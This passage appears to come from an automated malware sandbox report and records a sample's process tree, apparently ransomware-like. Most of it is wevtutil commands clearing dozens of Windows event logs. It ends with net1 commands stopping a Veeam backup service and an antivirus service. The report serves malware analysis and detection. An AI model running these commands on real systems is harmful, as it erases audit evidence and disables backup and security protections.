      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
      4⤵
      PID:1740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
      4⤵
      PID:1172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
      4⤵
      PID:3972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
      4⤵
      PID:1644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
      4⤵
      PID:3520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
      4⤵
      PID:3464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
      4⤵
      PID:2104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
      4⤵
      Clears Windows event logs
      PID:3512
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
      4⤵
      Clears Windows event logs
      PID:1952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
      4⤵
      Clears Windows event logs
      PID:2184
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
      4⤵
      PID:3604
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
      4⤵
      PID:2964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
      4⤵
      PID:1260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
      4⤵
      Clears Windows event logs
      PID:784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
      4⤵
      PID:3560
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
      4⤵
      PID:2708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
      4⤵
      PID:1424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
      4⤵
      PID:388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
      4⤵
      PID:1704
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
      4⤵
      PID:2804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
      4⤵
      PID:3624
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
      4⤵
      Clears Windows event logs
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
      4⤵
      PID:2748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
      4⤵
      Clears Windows event logs
      PID:2472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
      4⤵
      PID:2176
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
      4⤵
      PID:3280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:2560
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
      4⤵
      PID:3348
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
      4⤵
      PID:304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
      4⤵
      Clears Windows event logs
      PID:2068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
      4⤵
      PID:3764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
      4⤵
      PID:3468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
      4⤵
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
      4⤵
      PID:1884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
      4⤵
      PID:204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
      4⤵
      PID:4008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
      4⤵
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
      4⤵
      Clears Windows event logs
      PID:1320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
      4⤵
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
      4⤵
      PID:1740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
      4⤵
      PID:1172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
      4⤵
      PID:3972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
      4⤵
      PID:1644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
      4⤵
      Clears Windows event logs
      PID:3520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
      4⤵
      PID:3752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
      4⤵
      PID:3296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
      4⤵
      PID:1400
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
      4⤵
      PID:2444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
      4⤵
      PID:1180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
      4⤵
      PID:3708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:2120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
      4⤵
      Clears Windows event logs
      PID:788
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
      4⤵
      PID:840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
      4⤵
      PID:1688
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
      4⤵
      PID:1856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
      4⤵
      PID:3812
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
      4⤵
      PID:1436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
      4⤵
      PID:2852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
      4⤵
      PID:3180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
      4⤵
      PID:624
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
      4⤵
      PID:3932
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
      4⤵
      PID:4068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
      4⤵
      PID:4056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
      4⤵
      PID:1468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
      4⤵
      PID:2284
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
      4⤵
      PID:460
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
      4⤵
      PID:3656
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
      4⤵
      PID:372
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
      4⤵
      Clears Windows event logs
      PID:3936
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
      4⤵
      Clears Windows event logs
      PID:3292
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
      4⤵
      PID:3044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
      4⤵
      Clears Windows event logs
      PID:3476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
      4⤵
      PID:1280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
      4⤵
      Clears Windows event logs
      PID:3636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
      4⤵
      PID:3880
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
      4⤵
      PID:3712
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
      4⤵
      PID:3024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
      4⤵
      Clears Windows event logs
      PID:2504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
      4⤵
      PID:1620
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
      4⤵
      PID:3652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
      4⤵
      PID:3760
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
      4⤵
      Clears Windows event logs
      PID:2132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
      4⤵
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
      4⤵
      PID:2008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
      4⤵
      PID:2604
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
      4⤵
      PID:1084
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
      4⤵
      PID:2104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
      4⤵
      Clears Windows event logs
      PID:3512
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
      4⤵
      PID:1952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
      4⤵
      PID:1500
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
      4⤵
      PID:3604
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
      4⤵
      Clears Windows event logs
      PID:3320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
      4⤵
      Clears Windows event logs
      PID:788
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
      4⤵
      PID:840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
      4⤵
      Clears Windows event logs
      PID:1688
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
      4⤵
      PID:1856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
      4⤵
      PID:3776
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
      4⤵
      PID:388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
      4⤵
      PID:2432
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
      4⤵
      PID:3592
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
      4⤵
      PID:2180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
      4⤵
      PID:3624
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
      4⤵
      PID:2136
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
      4⤵
      PID:2472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
      4⤵
      PID:2796
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
      4⤵
      Clears Windows event logs
      PID:2576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
      4⤵
      PID:3032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
      4⤵
      PID:2264
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
      4⤵
      Clears Windows event logs
      PID:1184
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
      4⤵
      PID:3348
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
      4⤵
      PID:2268
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
      4⤵
      PID:280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
      4⤵
      PID:2996
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
      4⤵
      PID:3468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
      4⤵
      PID:3304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
      4⤵
      PID:2408
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
      4⤵
      Clears Windows event logs
      PID:272
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
      4⤵
      PID:4004
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
      4⤵
      PID:4008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
      4⤵
      Clears Windows event logs
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
      4⤵
      PID:3000
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
      4⤵
      Clears Windows event logs
      PID:1004
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
      4⤵
      PID:3540
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
      4⤵
      PID:2148
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
      4⤵
      PID:3792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
      4⤵
      PID:448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
      4⤵
      PID:3492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
      4⤵
      PID:3520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
      4⤵
      PID:2596
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
      4⤵
      Clears Windows event logs
      PID:3296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
      4⤵
      PID:3956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
      4⤵
      PID:2444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
      4⤵
      PID:2452
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
      4⤵
      PID:3708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
      4⤵
      PID:2820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
      4⤵
      PID:784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
      4⤵
      PID:920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
      4⤵
      PID:2708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
      4⤵
      PID:1424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
      4⤵
      PID:2244
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
      4⤵
      PID:1704
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
      4⤵
      PID:640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
      4⤵
      PID:2804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
      4⤵
      Clears Windows event logs
      PID:2728
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
      4⤵
      PID:3192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
      4⤵
      PID:3632
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:2748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
      4⤵
      PID:1468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
      4⤵
      PID:2256
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
      4⤵
      PID:460
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
      4⤵
      Clears Windows event logs
      PID:2860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3656
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
      4⤵
      PID:3384
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
      4⤵
      PID:304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
      4⤵
      PID:2068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
      4⤵
      PID:3044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
      4⤵
      PID:420
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
      4⤵
      PID:756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
      4⤵
      PID:3828
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
      4⤵
      PID:1884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
      4⤵
      PID:204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
      4⤵
      Clears Windows event logs
      PID:1912
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
      4⤵
      PID:860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
      4⤵
      PID:2504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
      4⤵
      PID:3472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
      4⤵
      PID:1740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
      4⤵
      Clears Windows event logs
      PID:1172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
      4⤵
      PID:2392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
      4⤵
      PID:3464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
      4⤵
      PID:3752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
      4⤵
      PID:1376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
      4⤵
      PID:2104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
      4⤵
      PID:3016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
      4⤵
      PID:1952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
      4⤵
      Clears Windows event logs
      PID:1504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
      4⤵
      PID:3784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
      4⤵
      PID:3320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
      4⤵
      PID:3660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
      4⤵
      PID:840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
      4⤵
      PID:2944
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
      4⤵
      Clears Windows event logs
      PID:4012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
      4⤵
      PID:3776
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
      4⤵
      PID:1436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
      4⤵
      PID:2432
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
      4⤵
      PID:3592
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
      4⤵
      PID:3932
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
      4⤵
      PID:2728
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
      4⤵
      PID:3192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
      4⤵
      PID:3632
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
      4⤵
      PID:2748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
      4⤵
      PID:1468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
      4⤵
      PID:2576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
      4⤵
      PID:3608
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
      4⤵
      PID:1380

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
1⤵
PID:1440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Antivirus"
1⤵
PID:2244

C:\Windows\system32\net1.exe
